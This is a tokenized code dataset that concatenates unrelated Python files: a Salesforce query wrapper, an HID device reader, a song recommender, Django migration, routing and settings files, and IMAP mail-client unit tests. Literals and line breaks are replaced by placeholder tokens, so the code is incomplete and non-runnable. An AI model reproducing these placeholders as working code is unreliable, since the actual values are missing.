ERROR , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e . code , ERROR ) <EOL> elif hasattr ( e , '<STR_LIT>' ) : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> ( token_url , e . reason [ <NUM_LIT:0> ] , e . reason [ <NUM_LIT:1> ] ) , ERROR , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e , ERROR ) <EOL> log_to_postgres ( '<STR_LIT>' % data , DEBUG ) <EOL> oauth = json . loads ( data ) <EOL> log_to_postgres ( '<STR_LIT>' % ( self . login_server , self . username ) ) <EOL> return oauth <EOL> def execute ( self , quals , columns , retry = True ) : <EOL> cols = '<STR_LIT>' ; <EOL> for column_name in list ( columns ) : <EOL> cols += '<STR_LIT>' % column_name <EOL> cols = cols [ <NUM_LIT:1> : ] <EOL> where = '<STR_LIT>' <EOL> parameters = [ ] <EOL> for qual in quals : <EOL> operator = '<STR_LIT>' if qual . operator == '<STR_LIT>' else qual . operator <EOL> where += '<STR_LIT>' % ( <EOL> qual . field_name , operator , qual . value ) <EOL> where = where [ <NUM_LIT:5> : ] <EOL> query = '<STR_LIT>' + cols + '<STR_LIT>' + self . obj_type <EOL> if len ( where ) > <NUM_LIT:0> : <EOL> query += '<STR_LIT>' % where <EOL> log_to_postgres ( '<STR_LIT>' % query ) <EOL> params = urllib . urlencode ( { <EOL> '<STR_LIT:q>' : query <EOL> } ) <EOL> query_url = ( self . oauth [ '<STR_LIT>' ] + <EOL> '<STR_LIT>' % params ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' % self . oauth [ '<STR_LIT>' ] <EOL> } <EOL> req = urllib2 . Request ( query_url , None , headers ) <EOL> queue = Queue ( ) <EOL> try : <EOL> stream = urllib2 . urlopen ( req ) ; <EOL> except urllib2 . URLError , e : <EOL> if hasattr ( e , '<STR_LIT:code>' ) : <EOL> if e . code == <NUM_LIT> and retry : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> self . oauth [ '<STR_LIT>' ] ) <EOL> self . oauth = self . get_token ( ) <EOL> for line in self . execute ( quals , columns , False ) : <EOL> yield line <EOL> return <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e . code , ERROR ) <EOL> elif hasattr ( e , '<STR_LIT>' ) : <EOL> log_to_postgres ( '<STR_LIT>' % <EOL> ( token_url , e . reason [ <NUM_LIT:0> ] , e . reason [ <NUM_LIT:1> ] ) , ERROR ) <EOL> else : <EOL> log_to_postgres ( '<STR_LIT>' % e , ERROR ) <EOL> t = Thread ( target = parseToQueue , args = ( stream , queue , self . column_map ) ) <EOL> t . daemon = True <EOL> t . start ( ) <EOL> item = queue . get ( ) <EOL> while item is not None : <EOL> yield item <EOL> queue . task_done ( ) <EOL> item = queue . get ( ) </s>
<s> import sys <EOL> import hid <EOL> import time <EOL> class VStrokerDevice ( object ) : <EOL> VID = <NUM_LIT> <EOL> PID = <NUM_LIT> <EOL> PRODUCT_NAME = "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . _device = None <EOL> @ staticmethod <EOL> def getDeviceList ( ) : <EOL> devices = [ ] <EOL> for d in hid . enumerate ( VStrokerDevice . VID , VStrokerDevice . PID ) : <EOL> if d [ "<STR_LIT>" ] != "<STR_LIT>" : <EOL> continue <EOL> devices . append ( d [ "<STR_LIT:path>" ] ) <EOL> return devices <EOL> def isOpen ( self ) : <EOL> return self . _device != None <EOL> def open ( self , path ) : <EOL> self . _device = hid . device ( ) <EOL> self . _device . open_path ( path ) <EOL> self . _device . set_nonblocking ( <NUM_LIT:1> ) <EOL> return True <EOL> def close ( self ) : <EOL> self . _device . close ( ) <EOL> self . _device = None <EOL> def getRawData ( self ) : <EOL> data = self . _device . read ( <NUM_LIT:10> ) <EOL> if len ( data ) == <NUM_LIT:0> : <EOL> return None <EOL> return data <EOL> def getParsedData ( self ) : <EOL> data = self . getRawData ( ) <EOL> if data is None : <EOL> return None <EOL> axis = [ ] <EOL> xor_byte = data [ <NUM_LIT:0> ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> a = ( ( ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:1> ] & <NUM_LIT> ) << <NUM_LIT:4> ) | ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:1> ] >> <NUM_LIT:4> ) ) ^ xor_byte <EOL> b = ( ( ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:2> ] & <NUM_LIT> ) << <NUM_LIT:4> ) | ( data [ ( i * <NUM_LIT:2> ) + <NUM_LIT:2> ] >> <NUM_LIT:4> ) ) ^ xor_byte <EOL> c = a | ( b << <NUM_LIT:8> ) <EOL> if c > <NUM_LIT:2> ** <NUM_LIT:15> : <EOL> c = c - <NUM_LIT:2> ** <NUM_LIT:16> <EOL> axis . append ( c ) <EOL> return axis <EOL> def main ( ) : <EOL> d = VStrokerDevice . getDeviceList ( ) <EOL> if len ( d ) == <NUM_LIT:0> : <EOL> print "<STR_LIT>" <EOL> return <NUM_LIT:1> <EOL> print d <EOL> v = VStrokerDevice ( ) <EOL> v . open ( d [ <NUM_LIT:0> ] ) <EOL> try : <EOL> while True : <EOL> l = v . getParsedData ( ) <EOL> if l is None : <EOL> time . sleep ( <NUM_LIT> ) <EOL> continue <EOL> print l <EOL> except KeyboardInterrupt : <EOL> return <NUM_LIT:0> <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sys . exit ( main ( ) ) </s>
<s> import sys <EOL> import scipy . io <EOL> import numpy <EOL> import util <EOL> mtxfile , evalfile , outfile = sys . argv [ <NUM_LIT:1> : ] <EOL> colisten = scipy . io . mmread ( file ( mtxfile ) ) . tocsr ( ) <EOL> listens = colisten . diagonal ( ) <EOL> listenranked = numpy . argsort ( - listens ) [ : <NUM_LIT> ] <EOL> with open ( outfile , '<STR_LIT:w>' ) as out : <EOL> for history in util . songs_by_user ( evalfile ) : <EOL> songs , counts = zip ( * history ) <EOL> sim = numpy . array ( counts ) [ numpy . newaxis , : ] * colisten [ numpy . array ( songs ) - <NUM_LIT:1> , : ] <EOL> simidxs = sim . nonzero ( ) [ <NUM_LIT:1> ] <EOL> srt = numpy . lexsort ( ( - listens [ simidxs ] , - sim [ <NUM_LIT:0> , simidxs ] ) ) <EOL> rankidxs = simidxs [ srt ] <EOL> guess = [ ] <EOL> for s in rankidxs : <EOL> if s + <NUM_LIT:1> in songs : <EOL> continue <EOL> guess . append ( str ( s + <NUM_LIT:1> ) ) <EOL> if len ( guess ) == <NUM_LIT> : break <EOL> else : <EOL> for s in listenranked : <EOL> if s + <NUM_LIT:1> in songs or s in rankidxs : <EOL> continue <EOL> guess . append ( str ( s + <NUM_LIT:1> ) ) <EOL> if len ( guess ) == <NUM_LIT> : break <EOL> out . write ( '<STR_LIT:U+0020>' . join ( guess ) + '<STR_LIT:\n>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] , max_length = <NUM_LIT> , default = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from django . conf . urls import patterns , include , url <EOL> from django . views . generic import TemplateView <EOL> from django . contrib import admin <EOL> admin . autodiscover ( ) <EOL> urlpatterns = patterns ( '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , include ( admin . site . urls ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> url ( r'<STR_LIT>' , TemplateView . as_view ( template_name = "<STR_LIT>" ) ) , <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> from mock import Mock , MagicMock <EOL> import unittest2 as unittest <EOL> from contextlib import contextmanager <EOL> from monocle . callback import defer <EOL> from helpers import mock_db , listen_for , mock_worker <EOL> def _account_for_test ( config = None , db = None ) : <EOL> from tinymail . account import Account <EOL> if config is None : <EOL> config = { <EOL> '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> if db is None : <EOL> db = MagicMock ( ) <EOL> return Account ( config , db ) <EOL> msg13_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> msg22_data = ( <NUM_LIT> , set ( [ ] ) , "<STR_LIT>" ) <EOL> class AccountTest ( unittest . TestCase ) : <EOL> def test_list_folders ( self ) : <EOL> account = _account_for_test ( ) <EOL> fol1 , fol2 = Mock ( ) , Mock ( ) <EOL> account . _folders = { '<STR_LIT>' : fol1 , '<STR_LIT>' : fol2 } <EOL> folders = list ( account . list_folders ( ) ) <EOL> self . assertEqual ( folders , [ fol1 , fol2 ] ) <EOL> def test_get_folder ( self ) : <EOL> account = _account_for_test ( ) <EOL> fol1 , fol2 = Mock ( ) , Mock ( ) <EOL> account . _folders = { '<STR_LIT>' : fol1 , '<STR_LIT>' : fol2 } <EOL> ret_fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertTrue ( ret_fol1 is fol1 ) <EOL> class FolderTest ( unittest . TestCase ) : <EOL> def test_list_messages ( self ) : <EOL> from tinymail . account import Folder <EOL> folder = Folder ( Mock ( ) , '<STR_LIT>' ) <EOL> msg1 , msg2 = Mock ( ) , Mock ( ) <EOL> folder . _messages = { <NUM_LIT:1> : msg1 , <NUM_LIT:2> : msg2 } <EOL> messages = list ( folder . list_messages ( ) ) <EOL> self . assertEqual ( messages , [ msg1 , msg2 ] ) <EOL> def test_get_message ( self ) : <EOL> from tinymail . account import Folder <EOL> folder = Folder ( Mock ( ) , '<STR_LIT>' ) <EOL> msg1 , msg2 = Mock ( ) , Mock ( ) <EOL> folder . _messages = { <NUM_LIT:1> : msg1 , <NUM_LIT:2> : msg2 } <EOL> self . assertEqual ( folder . get_message ( <NUM_LIT:1> ) , msg1 ) <EOL> self . assertEqual ( folder . get_message ( <NUM_LIT:2> ) , msg2 ) <EOL> class AccountUpdateTest ( unittest . TestCase ) : <EOL> def test_list_folders ( self ) : <EOL> from tinymail . account import account_updated <EOL> account = _account_for_test ( ) <EOL> folders = { '<STR_LIT>' : { } , '<STR_LIT>' : { } } <EOL> with mock_worker ( ** folders ) : <EOL> with listen_for ( account_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> self . assertEqual ( set ( f . name for f in account . list_folders ( ) ) , <EOL> set ( folders ) ) <EOL> self . assertEqual ( caught_signals , [ ( account , { } ) ] ) <EOL> def test_list_messages ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( set ( m . uid for m in fol1 . list_messages ( ) ) , <EOL> set ( [ <NUM_LIT:6> , <NUM_LIT:8> ] ) ) <EOL> event_data = { '<STR_LIT>' : [ <NUM_LIT:8> ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_message_removed_on_server ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . uid for m in fol1 . list_messages ( ) ] , [ <NUM_LIT:6> ] ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:8> ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_only_get_new_headers ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None , <NUM_LIT> : None } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . get_message_headers . assert_called_once_with ( set ( [ <NUM_LIT> ] ) ) <EOL> def test_empty_folder ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } ) as worker : <EOL> account . perform_update ( ) <EOL> self . assertFalse ( worker . get_message_headers . called ) <EOL> def test_load_full_message ( self ) : <EOL> from tinymail . account import message_updated <EOL> account = _account_for_test ( ) <EOL> mime_message = "<STR_LIT>" <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) as worker : <EOL> account . perform_update ( ) <EOL> message = account . get_folder ( '<STR_LIT>' ) . _messages [ <NUM_LIT:6> ] <EOL> worker . get_message_body . return_value = defer ( mime_message ) <EOL> worker . close_mailbox . reset_mock ( ) <EOL> with listen_for ( message_updated ) as caught_signals : <EOL> message . load_full ( ) <EOL> self . assertEqual ( message . raw_full , mime_message ) <EOL> self . assertEqual ( caught_signals , [ ( message , { } ) ] ) <EOL> worker . close_mailbox . assert_called_once_with ( ) <EOL> def test_folder_removed_on_server ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } , fol2 = { } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { } ) : <EOL> account . perform_update ( ) <EOL> self . assertEqual ( [ f . name for f in account . list_folders ( ) ] , [ '<STR_LIT>' ] ) <EOL> def test_trust_uidvalidity ( self ) : <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . list_messages ( ) ] , <EOL> [ msg13_data [ <NUM_LIT:2> ] ] ) <EOL> def test_uidvalidity_changed ( self ) : <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . list_messages ( ) ] , <EOL> [ msg13_bis_data [ <NUM_LIT:2> ] ] ) <EOL> def test_message_flags_changed ( self ) : <EOL> from tinymail . account import folder_updated <EOL> account = _account_for_test ( ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> account . perform_update ( ) <EOL> fol1 = account . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . flags for m in fol1 . list_messages ( ) ] , <EOL> [ set ( [ '<STR_LIT>' ] ) ] ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT> ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> def test_close_mailbox_after_update ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . close_mailbox . assert_called_once_with ( ) <EOL> class PersistenceTest ( unittest . TestCase ) : <EOL> def test_folders ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( myfolder = { } ) as worker : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> folders = list ( account2 . list_folders ( ) ) <EOL> self . assertEqual ( len ( folders ) , <NUM_LIT:1> ) <EOL> self . assertEqual ( folders [ <NUM_LIT:0> ] . name , '<STR_LIT>' ) <EOL> def test_folders_removed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { } , fol2 = { } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> self . assertEqual ( [ f . name for f in account2 . list_folders ( ) ] , [ '<STR_LIT>' ] ) <EOL> def test_messages ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg4_data = ( <NUM_LIT:4> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> msg22_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( myfolder = { <NUM_LIT:4> : msg4_data , <NUM_LIT> : msg22_data } ) as worker : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> myfolder = account2 . get_folder ( '<STR_LIT>' ) <EOL> messages = list ( myfolder . list_messages ( ) ) <EOL> messages . sort ( key = lambda m : m . uid ) <EOL> self . assertEqual ( len ( messages ) , <NUM_LIT:2> ) <EOL> msg4 , msg22 = messages <EOL> self . assertEqual ( msg4 . uid , <NUM_LIT:4> ) <EOL> self . assertEqual ( msg4 . flags , set ( [ r'<STR_LIT>' ] ) ) <EOL> self . assertEqual ( msg4 . raw_headers , "<STR_LIT>" ) <EOL> self . assertEqual ( msg22 . uid , <NUM_LIT> ) <EOL> self . assertEqual ( msg22 . flags , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) ) <EOL> self . assertEqual ( msg22 . raw_headers , "<STR_LIT>" ) <EOL> def test_message_removed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None , <NUM_LIT:8> : None } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT:6> : None } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . uid for m in fol1 . list_messages ( ) ] , [ <NUM_LIT:6> ] ) <EOL> def test_uidvalidity ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . _uidvalidity , <NUM_LIT> ) <EOL> def test_uidvalidity_changed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data , '<STR_LIT>' : <NUM_LIT> } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . _uidvalidity , <NUM_LIT> ) <EOL> self . assertEqual ( [ m . raw_headers for m in fol1 . list_messages ( ) ] , <EOL> [ msg13_bis_data [ <NUM_LIT:2> ] ] ) <EOL> def test_message_flags_changed ( self ) : <EOL> db = mock_db ( ) <EOL> account = _account_for_test ( db = db ) <EOL> msg13_bis_data = ( <NUM_LIT> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) : <EOL> account . perform_update ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_bis_data } ) : <EOL> account . perform_update ( ) <EOL> account2 = _account_for_test ( db = db ) <EOL> fol1 = account2 . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( [ m . flags for m in fol1 . list_messages ( ) ] , <EOL> [ set ( [ '<STR_LIT>' ] ) ] ) <EOL> class ModifyFlagsTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . db = mock_db ( ) <EOL> self . account = _account_for_test ( db = self . db ) <EOL> self . imap_data = { '<STR_LIT>' : { <EOL> <NUM_LIT:4> : ( <NUM_LIT:4> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> <NUM_LIT:15> : ( <NUM_LIT:15> , set ( [ r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> <NUM_LIT> : ( <NUM_LIT> , set ( [ r'<STR_LIT>' , r'<STR_LIT>' ] ) , "<STR_LIT>" ) , <EOL> } } <EOL> with mock_worker ( ** self . imap_data ) : <EOL> self . account . perform_update ( ) <EOL> def test_add_flag ( self ) : <EOL> from tinymail . account import folder_updated <EOL> fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> fol1 . change_flag ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:15> ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> worker . change_flag . assert_called_once_with ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:4> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:15> ) . flags , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol1B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:4> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:15> ) . flags , <EOL> set ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> def test_del_flag ( self ) : <EOL> from tinymail . account import folder_updated <EOL> fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> fol1 . change_flag ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> event_data = { '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ <NUM_LIT:4> , <NUM_LIT:15> ] } <EOL> self . assertEqual ( caught_signals , [ ( fol1 , event_data ) ] ) <EOL> worker . change_flag . assert_called_once_with ( [ <NUM_LIT:4> , <NUM_LIT:15> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:4> ) . flags , set ( ) ) <EOL> self . assertEqual ( fol1 . get_message ( <NUM_LIT:15> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol1B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:4> ) . flags , set ( ) ) <EOL> self . assertEqual ( fol1B . get_message ( <NUM_LIT:15> ) . flags , set ( [ '<STR_LIT>' ] ) ) <EOL> def test_close_mailbox_after_changing_flags ( self ) : <EOL> account = _account_for_test ( ) <EOL> with mock_worker ( fol1 = { <NUM_LIT> : msg13_data } ) as worker : <EOL> account . perform_update ( ) <EOL> worker . close_mailbox . reset_mock ( ) <EOL> account . get_folder ( '<STR_LIT>' ) . change_flag ( [ <NUM_LIT> ] , '<STR_LIT>' , '<STR_LIT>' ) <EOL> worker . close_mailbox . assert_called_once_with ( ) <EOL> class MessagesCopyTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . db = mock_db ( ) <EOL> self . account = _account_for_test ( db = self . db ) <EOL> self . imap_data = { '<STR_LIT>' : { <NUM_LIT> : msg13_data } , '<STR_LIT>' : { <NUM_LIT> : msg22_data } } <EOL> with mock_worker ( ** self . imap_data ) : <EOL> self . account . perform_update ( ) <EOL> self . fol1 = self . account . get_folder ( '<STR_LIT>' ) <EOL> self . fol2 = self . account . get_folder ( '<STR_LIT>' ) <EOL> def test_copy_one_message ( self ) : <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> worker . copy_messages . assert_called_once_with ( [ <NUM_LIT> ] , '<STR_LIT>' ) <EOL> def test_local_data_after_copy ( self ) : <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> fol2_msgs = list ( self . fol2 . list_messages ( ) ) <EOL> self . assertEqual ( len ( fol2_msgs ) , <NUM_LIT:2> ) <EOL> uid = max ( self . fol2 . _messages ) <EOL> msg = self . fol2 . get_message ( uid ) <EOL> self . assertEqual ( msg . flags , msg13_data [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( msg . raw_headers , msg13_data [ <NUM_LIT:2> ] ) <EOL> accountB = _account_for_test ( db = self . db ) <EOL> fol2B = accountB . get_folder ( '<STR_LIT>' ) <EOL> self . assertEqual ( len ( list ( fol2B . list_messages ( ) ) ) , <NUM_LIT:2> ) <EOL> msgB = fol2B . get_message ( uid ) <EOL> self . assertEqual ( msgB . flags , msg13_data [ <NUM_LIT:1> ] ) <EOL> self . assertEqual ( msgB . raw_headers , msg13_data [ <NUM_LIT:2> ] ) <EOL> def test_copy_event ( self ) : <EOL> from tinymail . account import folder_updated <EOL> with mock_worker ( ** self . imap_data ) as worker : <EOL> with listen_for ( folder_updated ) as caught_signals : <EOL> self . fol1 . copy_messages ( [ <NUM_LIT> ] , self . fol2 ) <EOL> uid = max ( self . fol2 . _messages . keys ( ) ) <EOL> event_data = { '<STR_LIT>' : [ uid ] , '<STR_LIT>' : [ ] , '<STR_LIT>' : [ ] } <EOL> self . assertEqual ( caught_signals , [ ( self . fol2 , event_data ) ] ) </s>
<s> DEBUG = True <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> DATABASES = { <EOL> '<STR_LIT:default>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> } <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = '<STR_LIT>' <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = '<STR_LIT>' <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> TEMPLATE_DIRS = ( <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> 